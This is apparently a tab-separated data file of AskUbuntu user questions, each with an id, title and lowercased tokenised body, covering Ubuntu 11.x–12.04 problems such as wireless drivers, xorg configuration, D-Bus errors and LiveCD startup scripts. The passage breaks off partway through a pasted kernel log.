166851	why can i only run hamster time tracker as root ?	i 've installed project hamster from source with : git clone git : //git.gnome.org/hamster-applet cd hamster-applet ./waf configure build -- prefix=/usr sudo ./waf install attempting to run it as myself gives the following output : ~ $ hamster-time-tracker traceback ( most recent call last ) : file `` /usr/bin/hamster-time-tracker '' , line 591 , in < module > from hamster.configuration import runtime , dialogs , conf , load_ui_file file `` /home/michael-robinson/.local/lib/python2.7/site-packages/hamster/configuration.py '' , line 79 , in < module > runtime = runtimestore ( ) file `` /home/michael-robinson/.local/lib/python2.7/site-packages/hamster/configuration.py '' , line 69 , in __init__ self.storage = storage ( ) file `` /home/michael-robinson/.local/lib/python2.7/site-packages/hamster/client.py '' , line 69 , in __init __ self.bus = dbus.sessionbus ( ) file `` /usr/lib/python2.7/dist-packages/dbus/_dbus.py '' , line 211 , in __new__ mainloop=mainloop ) file `` /usr/lib/python2.7/dist-packages/dbus/_dbus.py '' , line 100 , in __new__ bus = busconnection.__new__ ( subclass , bus_type , mainloop=mainloop ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 122 , in __new__ bus = cls._new_for_bus ( address_or_type , mainloop=mainloop ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noserver : failed to connect to socket /tmp/dbu s-wlzo4gfrbj : connection refused it runs ok as root : ~ $ sudo hamster-time-tracker how might i be able to modify my hamster installation so i can run it as a normal user ?
166856	how to edit unity 's panel launchers ?	i would like to know if there is an option to edit/know where it points/what 's the command that it launches - the unity 's panel launcher . the only option on right-click i get is quit/unlock form launcher . where are the configuration files responsible for that located ? this is mainly because i have some software installed not in a regular way - synaptic/apt-get/software center and the launcher was added by me ( by dragging it from the unity 's shell ) .
166858	how to change what program calenders are opened in	i was wondering ... i have the lightning plugin installed on thunderbird , and i was wondering if i could have calenders automatically opened in thunderbird/lightning , instead of gedit ? the only reason i 'm asking , is because in the `` change program '' area , it only shows gedit as an option . ( click here to see image . i ca n't post images until i have 10 rep ) thanks !
166861	why does n't ubuntu installed on ext4 with `` lubi '' work ?	i found this lubi installer ( linux ubuntu installer ) which is similar to wubi , except it allows to install any of ubuntu derivatives and do it from linux and not windows . it is exactly what i needed , installing ubuntu without having to burn to usb stick , mess again with the partitions , i have the iso downloaded already , it would be just install and run , really useful . i 've tried already to proceed as described here , however , even though all process was easy to follow and appeared to have been successfully executed , when i reboot pc , there is n't ubuntu option to boot from in the grub menu . then i checked the requirements and it states that lubi will not work on any systems using lvm , evms , or another logical volume manager , or filesystems other than ext2 , ext3 , reiserfs , vfat , ntfs , jfs , or xfs . my home partition default filesystem is ext4 , which is not listed in here . this may possibly be the reason why it does n't work . is there anyway to make lubi work on ext4 filesystem ? i 've been on this thread already and some other people have this issue as well , but there is no activity in there for over an year and no further updates about this .
166863	recording audio : what is the best volume setting ?	followup question : recording audio and volume i 've been using ubuntu to record some screencasts ( kinda . khan-style lectures , really ) i want to know what is the volume setting for the microphone for optimal results . i am guessing that `` base '' ( in pavucontrol ) or `` unamplified '' ( in the ubuntu volume control ) , and increasing the volume later in ffmpeg would be optimal for quality ( as compared to just using a higher setting ) is that true ? bonus points : are `` base '' and `` unamplified '' the same ? what does the `` 100 % '' setting in ubuntu volume control means , given that it is different than `` unamplified '' ?
166864	where can i get ubuntu templates/themes for joomla or wordpress ?	may you suggest me how to recreate/build a template/theme similar to askubuntu for a joomla/wordpress web site please ?
166865	setting up private nameservers	i am wanting to setup private nameservers ; like ns1.domain.com & ns2.domain.com and i am wanting to make my ubuntu server to point these nameservers to this machine . so now to manage dns for a domain like somedomain.com i can point that domain to ns1.domain.com and ns2.domain.com i have been looking into something like bind9 ; but i am not sure how i can get started with setting up private nameservers or is it something which i need to purchase from some where to register those as nameservers ? any help would be greatly appreciated . thanks !
166868	which one is the windows partition i want to delete in this gparted screenshot ?	basically i just got ubuntu yesterday as a dualboot . i am trying to delete windows vista now . i would have just got the usb install and just replaced ubuntu with windows but i kept getting errors . i am following this guys instructions to delete windows : how to uninstall windows ? so i am at gparted , and he says to delete the windows partition . i have a feeling the 2nd one is the windows partition , but it 's locked . here 's the first picture : the second partition i ca n't delete , it is just gray over the delete button . please help me delete windows !
166870	how to fix black screen whenever a game starts ?	when i launch minecraft , i log in , it updates , and then the screen turns black . when i launch counter-strike , it launches , shows the valve screen , and then the screen turns black . i 'm really pissed off because ive been trying non stop for two days looking through a bunch of bullshit that does n't work . i 'm on ubuntu 12.04 . i tried finding my intel hd graphics family driver for linux but acer does n't provide one . how might i fix this problem ?
166875	create fillable or editable fields in a pdf	i wonder how to create fillable forms in a pdf , such as this one . i would like to fill out the places that are required to fill out .
166878	how do i install drivers for ati x1650 pro	i am running ubuntu 12.04 32-bit and i have an ati x1650 pro 512mb but there are no drivers for my video card in the restricted drivers . how can i install drivers ?
166887	error message while trying to update/install a google product	w : failed to fetch http : //dl.google.com/linux/deb/dists/stable/release unable to find expected entry 'non-free/binary-i386/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //dl.google.com/linux/deb/dists/testing/non-free/binary-i386/packages 404 not found [ ip : 74.125.225.69 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . the above is the error message i get when trying to use a google product . i tried changing server to main server but that did n't work . apt-get update gives same results .
166890	how do i start an ssh session from the unity desktop with arguments ( -i ) ?	using ssh in a gnome terminal is fine . but i want to use it in a unity window ( the location text field , ctrl+l ) . i need to refer to my .pem x509 certificate for security reasons to connect to my amazon aws ec2 server instance , by using the -i argument that i use in the terminal command . in the terminal it looks like something like this : sudo ssh -i mykp.pem ubuntu @ ec2-something..etc.compute-x.amazonaws.com gui window : ssh : //ubuntu @ ec2-something..etc.compute-x.amazonaws.com ... .. ? ? ? thanks in advance for any help !
166896	how to fix gksu / kdesudo ? kdesudo ( 2831 ) kdesu : :kdesuprivate : :kcookie : :getxcookie : no x authentication info set for display `` :0 ''	command ( in terminal ) : leafpad result : leafpad without root rights working fine . what did i do to cause the error ? maybe i accidentally run sudo leafpad now i am having problems ... neither kdesudo nor gksu are functional . command : kdesudo leafpad error : kdesudo ( 2831 ) kdesu : :kdesuprivate : :kcookie : :getxcookie : no x authentication info set for display `` :0 '' no protocol specified no protocol specified leafpad : can not open display : command : gksu leafpad error : gkr-message : secret service operation failed : the name org.freedesktop.secrets was not provided by any .service files what must i do to fix the error ?
166902	how to know which network is connected ?	how can i see using command-line whether i am connected to network using eth0 , eth1 or wln0 etc ? well , to elaborate , i have a desktop sidebar which i installed using program `` conky '' . this sidebar has meter that shows internet speed . since i am not using eth0 , i need to make a minor change in ~/.conkyrc file . i need to replace `` eth0 '' with whatever network is being used by my wireless card to connect to internet ( via a router ) .
166903	how do i install itunes ?	i have an iphone and run ubuntu on all of my personal computers . since i did not want to keep a separate partition with windows on it for the sole purpose of running itunes , i attempted to install it using wine . i installed wine 1.4 from the software center and installed itunes 10.6.3 . when i tried to run it i got a slew of error messages . i hopped over to google where it was suggested that i install it through playonlinux . i did so with the same result . further googling revealed that itunes 10.6.x is confirmed to work with wine 1.5.1 and up . i installed wine 1.5.1 following the instructions i found and was unable to get it to open . i did the same with 1.5.9 with the same results . i opened the package manager and installed the wine 1.5.9 packages through it , and it appears to have installed properly . when trying to install itunes i got he error `` this itunes installer requires windows vista 64 bit or later '' . realizing that wine uses xp as a default i ran winecfg and changed it to windows 7 . this changed nothing and i tried changing it through winetricks to no avail . i even changed it to vista with the same results . does anyone know what is going wrong here and how to fix it ? thanks
166916	broadcom sta wireless drivers not working on dell inspiron 5420	i 'm new to linux . i just started working on ubuntu 12.04 . wifi is not working on ubuntu . it works on windows 7 though . when i tried connecting to the net throght lan it works . also , through lan i checked for additional drivers . there were no drivers found . the command lspci -nn | grep 0280 gives me : 02:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 )
166921	dell precision m65 broadcom bcm4311 wireless not working	i 've just installed ubuntu 12.04 lts to a usb stick and am having problems getting the wireless networking to function on my dell precision m65 . i 've read a lot of articles and tried a variety of things , including : removed bcmwl-kernel-source installed firmware-b43-installer installed b43-fwcutter installed firmware-b43-lpphy-installer per output from rfkill i do n't appear to have a hard or soft block , but i still have the message that `` wireless is disabled . '' here is some output from my system to help provide details : lspci -nn | grep 0280 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( rev 01 ) rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no any help with this is appreciated .
166926	unity sometimes ca n't seem to re-show a java gui app ( jpasswords )	i use a password manager called jpasswords because i can run it on most platforms and it can be self contained on a usb drive . under unity in ubuntu 12.04 , using openjdk , it runs fine , but if it get 's hidden , and maybe on another workspace , unity can not switch back to it . it will switch to the workspace , but the gui will not show . this might be related to the apps behaviour . what i am referring to is that , for security , it will time out , and next time you switch to it , it will pop up a window asking for a password . i have noticed that unity often misplaces child windows like this . i 've see it in other apps , and child windows can end up in strange places after workspace switching .
166927	how to restored ubuntu back to the default state when you first installed it ?	is there a way to restored ubuntu back to the default state like when you first installed it ? i have screwed with my current installation too much , and when i upgraded to ubuntu 12.04 the terminal will not work .
166929	how do i add more models to oregano ?	i installed oregano for studying electronics circuits . but whenever i press simulate button it says : gnucap 2009.12.07 rcs 26.136 the gnu circuit analysis package never trust any version less than 1.0 copyright 1982-2009 , albert davis gnucap comes with absolutely no warranty this is free software , and you are welcome to redistribute it under the terms of the gnu general public license , version 3 or later . see the file `` copying '' for details . untitled.oregano /usr/share/oregano/models/7400b.model : no such file or directory too few or none analysis found i googled and found this answer . it says it is not bug , and occurs because these models are not included in upstraem tarball . but i do n't know how to install these models .
166931	why is chromium not updated automatically as firefox is ?	firefox was automatically updated to version 14 a few days ago through update manager , but chromium web browser is still stuck in version 18 while google chrome is already in version 20 . why does this happen and how can i update my chromium to a more recent version ?
166934	how do i backup the pre-installed windows before installing ubuntu ?	i want to install only ubuntu on my new laptop . but before that , i would like to make a backup of the windows oem installation on my laptop and then later , in case i wanted to sell the laptop , i would copy it back no the disk to increase my chances of selling it for a reasonable price . i want to do this without having to start windows at all ( i.e . accept eula , etc . ) , and no , i do n't want to dual-boot .
166936	caffeine works but not for quodlibet	i have caffeine installed , and it works just fine in gnome-classic ( no effects ) for preventing sleeping for most processes . for example `` vlc '' , `` mplayer '' , and `` totem '' all work . i can not get it to recognize quodlibet . it used to work in lucid , but after a recent upgrade , it does n't work . i have tried qoudlibet and python /usr/bin/quodlibet and /usr/bin/quodlibet as the process name , and none of them work . any ideas ?
166937	amd radeons overscan is reset after every boot	i have an amd radeon 6850 in my set up which is connected to my monitor via an hdmi cable . after installing the latest fglrx drivers , version 12.6 , i need to drag the overscan slider all the way to the right to make the desktop properly fit my monitor . but now after every reboot the overscan image is very small and there is about a 2 inch large border around my display . when i open catalyst control center the overscan slider is still as far to the right as possible , but when i slide it all the way to the left and then to the right again it fits my screen perfectly . how to i stop this small inconvenience ?
166942	i can not install ubuntu server 12.04 lts because it can not mount the cd drive	i tried installing ubuntu server 12.04 lts , and it does n't work . well , it does , until the third step , in which it says it can not mount the cd-rom drive and tells me to insert the installation disk . i am using a usb to install . if i put in the dvd into the drive and i try to boot it the computer just boots to ubuntu ( ubuntu desktop ) . i have a spare drive if this one is faulty , but i do n't want to need to install it . i am also using the 64-bit version .
166945	very strange bug in ubuntu ( introduced in recent months ' updates )	i have been using my thinkpad x200 with ubuntu since i bought it several yeas ago , every time doing a clean install when switching versions instead of upgrading one on top of the other . i have never had any issue with the hardware drivers , and ubuntu , as usual , was quite pleasing . however , few months ago ( i do not recall when exactly that happened , perhaps during may or june this year ) i have noticed that when i boot the system , the wifi is not available , that is : hardware button is set to active on top-right corner i see the bt icon , but not the wifi icon ifconfig / ip addr show the interface wlan0 is down bringing it up with ifconfig wlan0 up make no change . plugging in a cable , `` wakes up '' networking and wifi icon becomes available , as well as active and up interface . i wonder which logs shall i look at in order to start understanding the roots of this issue ? i could not grasp anything out of /var/log/syslog that will explain this .
166947	i have only 1 workspace , but in the settings it shows 4 as the number of workspaces that i have on ubuntu studio 12.04 .	i am using ubuntu studio 12.04 with xfce . i only have 1 workspace , but in the settings it shows 4 as the number of workspaces . i have try naming them , but nothing happen .
166953	how to make pavucontrol changes permanent ?	because of skype sound issues i installed pavucontrol and i can change settings so the sounds work again with skype . i had to set both ( recording & playback of skype ) to `` built-in audio analog stereo '' instead of `` monitor of built-in audio digital stereo ( hdmi ) '' , i could only edit it when a skype call was in progress . but unfortunately after a while not using skype the settings in the pavucontrol return to the default sink `` monitor of built-in audio digital stereo ( hdmi ) '' , even though i press the lock sign in pavucontrol ... how do i make the changes to pavucontrol permanent ? i use skype 4.008 in ubuntu 12.04 ( amd64 ) . interestingly the `` monitor of built-in audio digital stereo ( hdmi ) '' does not show up in the `` sounds settings '' of gnome-control , there is only one sink `` analog output - built-in audio '' . i 've uploaded to pastebin the output from pacmd list-sinks and pacmd list-modules .
166955	missing tabs on taskbar	i got shifted to a new workstation shortly . the system is using ubuntu 11.04 - the natty narwhal - released in april 2011 and supported until october 2012 . i found the bottom taskbar missing in it . i added it by clicking `` new panel '' . i can see the trash and the 4 workspaces , but i ca n't see the minimized tabs/windows on it . i searched for a fix but in vain . how to fix this ? any suggestions ?
166957	realtek 2800 wireless card disabled while not shown as blocked	i recently installed ubuntu 11.04 on my desktop , but when i start up the computer the wireless does n't work . i know this is a popular question , i did a search and people seems to have trouble with software/hardware block , or driver issue ... but none of them seems applicable to me . if i click on the network icon at the top right corner , it shows wireless as `` disconnected '' but it does n't list available networks . if i uncheck/check the `` enable wireless '' option to reset , the option will stay as `` disabled '' . if i uncheck/check the `` enable networking '' to reset the network interface , then the wireless shows as `` device not ready '' . if i run sudo rfkill list all , wireless shows as soft blocked : no and hard blocked : no . if i run lshw -c network , wireless shows as disabled , and driver shows as rt2800pci . if i run nm-tool , there are no wireless access points listed . thus i know my wireless card has a proper driver , it is not soft/hard blocked , and my desktop should n't have any hardware switch ... so what other steps i can go to trouble shoot this issue ? ?
166958	how/can i use outlook in ubuntu mail server ? thanks	how/can i use outlook in ubuntu mail server ?
166959	how do i get my sony viao to connect to bluetooth devices ?	i am on a sony viao e-series , it is brand new , so i am still setting things up , and learning to use ubuntu for the first time . i am dual booting win7 and ubuntu 12.04 , but i indend to mostly use ubuntu . problem is , i have not been able to get bluetooth to recognize any devices that i try to connect , most important of which is my bluetooth mouse . it always searches , but will not find my mouse nor any other bluetooth device around . the thing is , the bluetooth connected to my mouse just fine when i first installed 12.04 as 32bit . i have since realised i had a 64bit computer , and so i reinstalled and put on 64 bit . however if i recall right the bluetooth first stopped working after the first time i restarted my computer back in the 32 bit version . bluetooth works flawlessly when i am running windows 7 . i have been looking for drivers , but have not found any , i have also tried to blueman in place of the default bluetooth program ... also no luck . the trackpad on this computer is awful . getting the mouse working is very important . half the time the trackpad inexplicbly throws the mouse to the left edge of the screen and starts an application that i dont want to use . possibly useful info from the terminal : $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 006 : id 0489 : e036 foxconn / hon hai bus 001 device 004 : id 5986:02d3 acer , inc
166965	fonts look strange in firefox	i have just moved from windows to ubuntu 12.04 ( with firefox 11 ) , and the fonts in some of my favorite sites ( especially hebrew sites ) look strange . i looked at the css and saw such fonts such as `` david '' , `` arial '' , etc . apparently these fonts are not installed on my firefox . how do i install them ?
166968	/etc/x11/xorg.conf file is not available	i am using sony vpcz136gg laptop . os ubuntu 11.10 /etc/x11/xorg.conf file is not available . i can set only 1600 x 900 ( 16:9 ) resolution . not able to connect projector . i want to add multiple screen resolution . how to do this . lspci | grep `` vga '' 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 330m ] ( rev a2 ) when i am upgrading always coming this error ! http : //i.imgur.com/0hk4b.jpg i am using , intel vga . i disabled nvidia card , because 3d is not working wile using nvidia . note : i upgraded from ubuntu 11.04 to 11.10 after that i am getting this problem
166977	questions pertaining to backing up on ubuntu	firstly , i wonder if it would n't hurt to backup everything , are there any downsides to backing everything up ? ( such as errors/bugs related to copying certain files ) secondly , i am unsure whether the `` file system '' is the directory that contains everything . ( alternate version of the question : does the `` / '' folder-thing contain all the information stored on my computer ? ) lastly , i installed dropbox because it encrypts my files . which i do n't know if ubuntu one does . are they the same exact thing ? or does dropbox encrypt and ubuntu one does n't ?
166986	run commands at startup	my problem is as follows : i want to to modify my ubuntu livecd to run several commands at startup , but i 'm new to ubuntu development and do n't know how to do this . what is the proper way to run these commands every time i boot ubuntu ? here are ex . commands : sudo rm /home/ubuntu/desktop/examples.desktop sudo perl -e 'print ( `` [ desktopentry ] \nversion=1.0\ntype=application\nterminal=false\nicon=xinput_calibrator\nname=calibraion\nexec=env /usr/bin/xinput_calibrator\n '' ) ; ' > /home/ubuntu/desktop/calibrate.desktop sudo /home/ubuntu/desktop/calibrate.desktop edit ! ! ! i 've actually tried modifying rc.local file and it looks like this now : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . sudo rm /home/ubuntu/desktop/examples.desktop sudo perl -e 'print ( `` [ desktopentry ] \nversion=1.0\ntype=application\nterminal=false\nicon=xinput_calibrator\nname=calibraion\nexec=env /usr/bin/xinput_calibrator\n '' ) ; ' > /home/ubuntu/desktop/calibrate.desktop sudo /home/ubuntu/desktop/calibrate.desktop exit 0 but still i do n't know if it is going to work . i want to be sure before i 'll build iso . edit 2 ! ! ! i 've build iso file using this tutorial : https : //help.ubuntu.com/community/livecdcustomization i 've done steps : extract the cd .iso contents extract the desktop system then i 've edited the rc.local file and saved assembling the file system ( i 've ommited `` regenerate manifest '' point ) and now i get error no init found . try passing init= bootarg while booting my livecd . passing init= bootarg results in : /bin/sh : bootarg : not found what am i doing wrong ? thanks
166987	how do i change login screen in ubuntu 11.10 with kde installed ?	i used simple lightdm manager to change login screen images in my ubuntu 11.10 system . but after i have installed kde environment this software does not works . login screen changes do not apply now , it just shows black background with white dots and same login manger instead . i need solution on how do i change this login screen image now .
166989	how to completely uninstall 12.04 and revert to 11.04 ?	i am trying to uninstall 12.04 to revert back to 11.04 due to compiler compatibility issues . i tried installing using an .iso of ubuntu 11.04 on a burned cd but the screens stops after flashing ubuntu 11.04 . please help .
166992	srst failed ( errno = -16 ) while resuming from suspend	i see this error briefly at the top of a full screen console-type text screen as the computer restarts from suspend . at the start of the message is something about ata , so i think it 's to do with a hard disk restarting and something failing . should i worry ? everything seems to be working . edit : smart status on the 2 disk drives is green , although one has a few bad sectors . i will watch it more closely .
166994	how can i tell the update dialog box from showing while i am doing some presentaion or etc ?	ubuntu 12.04 i am using , often without my command , it shows following : how can i permanently stop/disable/kill this , using command line ? ( every-time it pop-ups like i am showing my own presentation , or i left my pc for idle longer and came back to give my lecture , this popup shows , which is very very annoying in many use case i had ) .
167000	xorg server configuration fail - no screens detected	i have a serious problem with xorg server on ubuntu 12.04 ( with nvidia 420m gt card ) . at home i am using an external monitor connected to my laptop 's hdmi port - the external display is used as extended . but then when i leave my house and go e.g . to work i do n't use it anymore but my xorg 's config file remains as it was and then some bad things happen . for instance - every time when i boot after disconnecting the external monitor i get some not default font and bigger than usual + some windows with errors about not compatible resolution modes . but today i have tried to boot normally without the additional monitor and xorg server has failed and i can not boot to gui . i am receiving this [ 101.830 ] x.org x server 1.11.3 release date : 2011-12-16 [ 101.831 ] x protocol version 11 , revision 0 [ 101.831 ] build operating system : linux 2.6.42-26-generic x86_64 ubuntu [ 101.831 ] current operating system : linux icanseeyou 3.2.0-26-generic # 41-ubuntu smp thu jun 14 17:49:24 utc 2012 x86_64 [ 101.831 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-26-generic root=uuid=1384cee0-6a71-4b83-b0d3-1338db925168 ro recovery nomodeset [ 101.831 ] build date : 16 july 2012 08:06:31pm [ 101.832 ] xorg-server 2:1.11.4-0ubuntu10.6 ( for technical support please see http : //www.ubuntu.com/support ) [ 101.832 ] current version of pixman : 0.24.4 [ 101.832 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 101.832 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 101.834 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : mon jul 23 09:48:40 2012 [ 101.834 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 101.834 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 101.834 ] parse error on line 7 of section serverlayout in file /etc/x11/xorg.conf `` -reen0 '' is not a valid keyword in this section . [ 101.835 ] ( ee ) problem parsing the config file [ 101.835 ] ( ee ) error parsing the config file [ 101.835 ] fatal server error : [ 101.835 ] no screens found [ 101.836 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 101.836 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 101.836 ] [ 101.836 ] ddxsiggiveup : closing log [ 101.836 ] server terminated with error ( 1 ) . closing log file . i have also received error that screens have been detected but none of them has a proper configuration file but then i have tried to reset xorg to its defaults ( in failsafe mode ) with sudo dpkg-reconfigure xserver-xorg ( i got no output form that ) and now i am stuck with this . to be honest - i have this error while trying to log on to failsafe mode and get the ubuntu splash image when trying to boot normally . here is my config file xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 13:37:33 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' -1920 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` lgd '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` acer p215h '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 420m '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 420m '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' # removed option `` twinview '' `` 0 '' # removed option `` twinviewxineramainfoorder '' `` dfp-0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 '' # removed option `` twinview '' `` 1 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +1920+0 , dfp-1 : nvidia-auto-select +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinviewxineramainfoorder '' `` dfp-1 '' option `` twinview '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection and this is my xorg.conf.failsafe section `` device '' identifier `` configured video device '' driver `` vesa '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection
167014	recommendations for a file-sharing website download manager	i am in a need of a better download manager badly . can any one please tell me the name of a download manager which can download from any file sharing site by file sharing site i mean rapidshare.com , hotfile.com , megaupload.com , megashare.com etc . now , wget ca n't download a file from rapidshare . i was advised to use steadyflow ; but it was buggy . there is a dl manager like freerapid or something ; but that does n't support other sites . someone said me to use jdownloader ; but it loses connection now and then and then i had to manually reconnect the connection ; so i discarded that . so far i google , i got ploshare pretty useful ; but it also does n't support all the sites above . any ideas ?
167015	how to find out which partition is ubuntu installed on ?	# fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3b7e273f device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 266242047 133017600 7 hpfs/ntfs/exfat /dev/sda3 266242048 976771071 355264512 7 hpfs/ntfs/exfat is there a way to find out on which of the listed partitions is my linux distribution installed on ? i installed it with wubi . ubuntu is my distribution . i 'm aware of a similar question here , but it does n't seem to provide a concise answer .
167016	how to install every thing on from the installation dvd ?	i have downloaded the dvd ( 12.04 ) and i want to sure i have installed every thing on it , so that i may save my internet usage when i need to install new packages . that is , apt wont download the packages that are already installed . any idea ? thanks a lot .
167023	great problems with nic and ubuntu-server-12.04	i have really great troubles with the onboard-nic ( realtek rtl8111/r8168 ) and my ubuntu-server 12.04 : every 3 hours the server is going to become unresponsible . then the server breaks down completely . the syslog says about the nic ( 05:00.0 ) : jul 23 11:07:36 bart kernel : [ 196.755466 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ac0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.756532 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ac0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.757077 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ad0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.757623 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092af0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.758166 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092af0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.758707 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092af0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759237 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092af0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ac0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ad0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ac0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ad0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092af0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ac0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ac0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ad0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ad0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 